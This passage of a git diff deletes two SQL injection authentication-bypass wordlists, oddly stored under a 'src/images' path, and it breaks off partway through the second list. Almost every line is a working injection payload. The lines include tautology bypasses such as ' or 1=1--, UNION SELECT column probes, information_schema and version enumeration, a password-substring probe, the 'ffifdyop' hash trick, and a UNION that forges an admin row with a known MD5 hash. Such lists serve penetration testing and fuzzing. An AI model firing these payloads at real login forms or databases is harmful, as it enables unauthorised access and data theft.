-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
